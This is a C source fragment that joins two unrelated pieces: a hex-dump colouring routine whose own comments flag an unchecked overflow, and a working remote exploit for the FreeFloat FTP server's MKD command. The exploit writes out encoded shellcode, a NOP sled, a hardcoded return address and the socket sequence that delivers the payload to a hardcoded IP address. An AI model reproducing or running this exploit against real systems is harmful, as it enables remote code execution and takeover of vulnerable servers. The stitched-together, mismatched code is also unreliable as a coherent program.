// XXX: redesign ? :)
R_API char *r_print_hexpair(RPrint *p, const char *str, int n) {
const char *s, *lastcol = Color_WHITE;
char *d, *dst = (char *)malloc ((strlen (str)+2)*32);
int colors = p->flags & R_PRINT_FLAGS_COLOR;
/* XXX That's hacky as shit.. but partially works O:) */
/* TODO: Use r_print_set_cursor for win support */
int cur = R_MIN (p->cur, p->ocur);
int ocur = R_MAX (p->cur, p->ocur);
int ch, i;
if (p->cur_enabled && cur==-1)
cur = ocur;
ocur++;
#if CURDBG
sprintf (dst, "(%d/%d/%d/%d)", p->cur_enabled, cur, ocur, n);
d = dst+ strlen(dst);
#else
d = dst;
#endif
// XXX: overflow here
// TODO: Use r_cons primitives here
#define memcat(x,y) { memcpy(x,y,strlen(y));x+=strlen(y); }
//for (s=str, d=dst; *s; s+=2, d+=2, i++) {
for (s=str, i=0 ; *s; s+=2, d+=2, i++) {
if (p->cur_enabled) {
if (i==ocur-n)
//memcat (d, "\x1b[27;47;30m");
//memcat (d, "\x1b[0m");//27;47;30m");
memcat (d, "\x1b[0m");
memcat (d, lastcol);
if (i>=cur-n && i<ocur-n)
memcat (d, "\x1b[7m");
}
if (colors) {
if (s[0]=='0' && s[1]=='0') lastcol = Color_GREEN;
else if (s[0]=='7' && s[1]=='f') lastcol = Color_YELLOW;
else if (s[0]=='f' && s[1]=='f') lastcol = Color_RED;
else {
ch = r_hex_pair2bin(s);
//sscanf (s, "%02x", &ch); // XXX can be optimized
if (IS_PRINTABLE (ch))
lastcol = Color_MAGENTA;
}
memcat (d, lastcol);
}
memcpy (d, s, 2);
}
if (colors || p->cur_enabled)
memcpy (d, Color_RESET, strlen (Color_RESET)+1);
else *d = 0;
return dst;
}
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
struct module_t *self;
int sock_fd;
char buffer[1024];
char attack_string[1006];
char *sc;
int space;
int offset;
char *junk;
char *nops;
offset = 0;
space = 0;
self = module;
print_error("self.offset = %d", self->target.offset);
memset(&buffer, 0, 1024);
/* Hard coded until i get a good options method setup */
sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024);
memset(&attack_string, '\x90', 1006);
sc =
"\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
"\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
"\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
"\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
"\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
"\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
"\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
"\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
"\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
"\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
"\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
"\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
"\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
"\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
"\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
"\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
"\xa2\xeb\x2c";
/* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/
space = (1006 - 4 - 247 - strlen(sc) - 4 - 2);
junk = make_buff('A', 247);
nops = make_buff('\x90', space);
memcat(attack_string, 1006, &offset, "MKD ", 4);
memcat(attack_string, 1006, &offset, junk, 247);
memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4);
memcat(attack_string, 1006, &offset, nops, space);
memcat(attack_string, 1006, &offset, sc, strlen(sc));
memcat(attack_string, 1006, &offset, "\r\n", 2);
tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024);
tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024);
tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024);
free(junk);
free(nops);
return 0;
}
